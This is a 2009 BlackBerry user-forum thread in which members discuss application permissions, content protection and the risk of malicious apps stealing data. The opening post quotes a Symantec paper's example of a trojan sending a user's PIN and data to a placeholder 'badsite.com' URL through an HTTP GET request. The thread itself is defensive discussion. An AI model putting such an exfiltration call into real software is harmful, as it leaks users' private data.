BlackBerry Forums Support Community               

Closed Thread
 
LinkBack Thread Tools
Old 08-26-2009, 03:01 PM   #1 (permalink)
Talking BlackBerry Encyclopedia
 
Preroll's Avatar
 
Join Date: Nov 2008
Model: 9930
OS: 7.0.0.254
PIN: N/A
Carrier: Verizon
Posts: 424
Post Thanks: 0
Thanked 6 Times in 5 Posts
Exclamation Blackberry Security (Module Permissions)

Please Login to Remove!

I was reading the following article posted by Symantec:

http://www.symantec.com/avcenter/ref...ry.devices.pdf

I found one section to be quite scary:

Data Theft
A user installs some apparently useful application or video game. The application steals the user's informa-
tion and the information is passed to the attacker via a HTTP GET request. I.e.:
http://www.badsite.com/upload?&PIN=9...his+is+top+sec
ret+data


Anybody up on the level of actual attacks downloading third party applications and allowing User Data to be exploited?
Offline  
Old 08-26-2009, 07:58 PM   #2 (permalink)
BlackBerryForums.com Super Moderator
 
SteveO86's Avatar
 
Join Date: Sep 2007
Location: Florida
Model: 9650
OS: 6.0.0.280
PIN: I heard it drop!
Carrier: VZW BIS
Posts: 6,534
Post Thanks: 0
Thanked 4 Times in 1 Post
Default

Most applications that attempt to access those RIM API's will most likely throw a message up and ask do you want to allow the connection, so the user (while unsuspecting) still has to say "yes".

I think it would be hard to find those apps, unless they really start showing up... When those types of applications do start appearing, you will see countless Blog posts from every major BlackBerry website posting warnings about the threat. (The BlackBerry community is great at keeping everyone in the "loop")
__________________
8830 -> 8330 -> 9550 -> 9650
Just think about how far BlackBerries have come from then till now... And what else is coming.

Follow me on Twitter
Offline  
Old 08-27-2009, 05:25 PM   #3 (permalink)
Talking BlackBerry Encyclopedia
 
Preroll's Avatar
 
Join Date: Nov 2008
Model: 9930
OS: 7.0.0.254
PIN: N/A
Carrier: Verizon
Posts: 424
Post Thanks: 0
Thanked 6 Times in 5 Posts
Default

I wonder if turning on content protection would prohibit the upload of user data ? Seems that my unit slows way down when using content protection and the caller id from the phone book is gone when it's locked with a password.
Offline  
Old 08-27-2009, 06:21 PM   #4 (permalink)
CrackBerry Addict
 
DaBlackberryBoy's Avatar
 
Join Date: Jul 2006
Location: NUNYA
Model: 9850
PIN: URADUMAS
Carrier: Verizon
Posts: 669
Post Thanks: 0
Thanked 3 Times in 3 Posts
Default

I would venture to say that hackers will see this thread and get ideas. I think the best protection is still, know what you install from who. I tend to go with companies that are partnered with Blackberry, which doesn't mean anything, but gives me some sort of sense of peace against stuff like this.
__________________
DaBlackberryBoy
-- http://wardsmitchelljr.com --
Offline  
Old 08-27-2009, 08:32 PM   #5 (permalink)
BlackBerry Extraordinaire
 
Join Date: Jan 2006
Model: LEZ10
OS: 10.0.10
Carrier: Rogers CA
Posts: 1,704
Post Thanks: 20
Thanked 77 Times in 68 Posts
Default

Quote:
Originally Posted by SteveO86 View Post
Most applications that attempt to access those RIM API's will most likely throw a message up and ask do you want to allow the connection, so the user (while unsuspecting) still has to say "yes".

I think it would be hard to find those apps, unless they really start showing up... When those types of applications do start appearing, you will see countless Blog posts from every major BlackBerry website posting warnings about the threat. (The BlackBerry community is great at keeping everyone in the "loop")
There is a blog management application announced in this very forum that requests Input Simulation (Event Injection) permission to turn the camera off after taking a picture, and Security Timeout for some undisclosed purpose. With these two permissions any application can pwne your Blackberry. Yet when I voiced my concerns I was roundly ignored. So your hope that the blogosphere will protect us is, sadly, misplaced.
__________________
My other Blackberry is a PlayBook.

Last edited by hrbuckley : 08-27-2009 at 08:35 PM. Reason: Spelling
Offline  
Old 08-27-2009, 08:35 PM   #6 (permalink)
BlackBerry Extraordinaire
 
Join Date: Jan 2006
Model: LEZ10
OS: 10.0.10
Carrier: Rogers CA
Posts: 1,704
Post Thanks: 20
Thanked 77 Times in 68 Posts
Default

Quote:
Originally Posted by Preroll View Post
I wonder if turning on content protection would prohibit the upload of user data ? Seems that my unit slows way down when using content protection and the caller id from the phone book is gone when it's locked with a password.
Not if you are going to give the application permission to access the data. If you don't grant permission then (in this case) content protection is irrelevant.
__________________
My other Blackberry is a PlayBook.
Offline  
Old 08-28-2009, 12:08 PM   #7 (permalink)
Talking BlackBerry Encyclopedia
 
Preroll's Avatar
 
Join Date: Nov 2008
Model: 9930
OS: 7.0.0.254
PIN: N/A
Carrier: Verizon
Posts: 424
Post Thanks: 0
Thanked 6 Times in 5 Posts
Default

Quote:
Originally Posted by hrbuckley View Post
Not if you are going to give the application permission to access the data. If you don't grant permission then (in this case) content protection is irrelevant.
So if I DO give permission to the application to access the User Data and the data has Content Protection turned on with encryption, can that encrypted User Data still be jeopardized I guess is where I'm going with this?
Offline  
Old 08-29-2009, 10:01 AM   #8 (permalink)
BlackBerry Extraordinaire
 
Join Date: Jan 2006
Model: LEZ10
OS: 10.0.10
Carrier: Rogers CA
Posts: 1,704
Post Thanks: 20
Thanked 77 Times in 68 Posts
Default

Content protection encrypts the data when it is not in use, and decrypts it "just in time" when an application accesses it. So if you grant malware permission to access your data then it will be able to access your data if you have content protection on or not.

The purpose of content protection is to prevent someone getting your data by dumping the memory from a lost or stolen Blackberry. It doesn't protect the data from applications loaded on the device, that is what application permissions do.

By the way, by default all applications are granted permission to access and change the PIM dta.
__________________
My other Blackberry is a PlayBook.
Offline  
Old 08-31-2009, 12:44 PM   #9 (permalink)
Talking BlackBerry Encyclopedia
 
Preroll's Avatar
 
Join Date: Nov 2008
Model: 9930
OS: 7.0.0.254
PIN: N/A
Carrier: Verizon
Posts: 424
Post Thanks: 0
Thanked 6 Times in 5 Posts
Default

Quote:
Originally Posted by hrbuckley View Post
Content protection encrypts the data when it is not in use, and decrypts it "just in time" when an application accesses it. So if you grant malware permission to access your data then it will be able to access your data if you have content protection on or not.

The purpose of content protection is to prevent someone getting your data by dumping the memory from a lost or stolen Blackberry. It doesn't protect the data from applications loaded on the device, that is what application permissions do.

By the way, by default all applications are granted permission to access and change the PIM dta.
Thanks. That's what I was curious to find out. It's still kind of disconcerting that applications need access to the user data. Some work without it but most won't function with it set to deny. Obviously if it's an application that needs to access your contacts then it's understandable but there are others that don't so in that case I would assume there are other files needed under user data that it may need?
Offline  
Old 08-31-2009, 03:47 PM   #10 (permalink)
BlackBerry Extraordinaire
 
Join Date: Jan 2006
Model: LEZ10
OS: 10.0.10
Carrier: Rogers CA
Posts: 1,704
Post Thanks: 20
Thanked 77 Times in 68 Posts
Default

Quote:
Originally Posted by Preroll View Post
Thanks. That's what I was curious to find out. It's still kind of disconcerting that applications need access to the user data. Some work without it but most won't function with it set to deny. Obviously if it's an application that needs to access your contacts then it's understandable but there are others that don't so in that case I would assume there are other files needed under user data that it may need?
Some applications provide added value from accessing your data, if you want what they do for you. The Facebook contact list interface is a good one. You can say no and the remainder of facebook continues to work.

What is really frustrating, especially with the Wordpress app, is that they have the framework to detect that the user said "No" to a particular permission, and then avoid functions that need it. Instead they (as of my last download) crash.

I forgot to mention before that you can, of course, set the defaults on your personal device to be more restrictive and keep all third party apps out of your PIM data, if that is what you want.
__________________
My other Blackberry is a PlayBook.
Offline  
Old 08-31-2009, 05:35 PM   #11 (permalink)
Talking BlackBerry Encyclopedia
 
Preroll's Avatar
 
Join Date: Nov 2008
Model: 9930
OS: 7.0.0.254
PIN: N/A
Carrier: Verizon
Posts: 424
Post Thanks: 0
Thanked 6 Times in 5 Posts
Default

Quote:
Originally Posted by hrbuckley View Post
I forgot to mention before that you can, of course, set the defaults on your personal device to be more restrictive and keep all third party apps out of your PIM data, if that is what you want.
You mean by going to Application Permissions and changing Default Permissions?
Offline  
Old 08-31-2009, 07:23 PM   #12 (permalink)
BlackBerry Extraordinaire
 
Join Date: Jan 2006
Model: LEZ10
OS: 10.0.10
Carrier: Rogers CA
Posts: 1,704
Post Thanks: 20
Thanked 77 Times in 68 Posts
Default

Yes. For installed apps you will/may have to go and change them individually.
__________________
My other Blackberry is a PlayBook.
Offline  
Closed Thread


Thread Tools

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

vB code is On
Smilies are On
[IMG] code is On
HTML code is Off
Trackbacks are On
Pingbacks are On
Refbacks are On





Copyright 2004-2014 BlackBerryForums.com.
The names RIM and BlackBerry are registered Trademarks of BlackBerry Inc.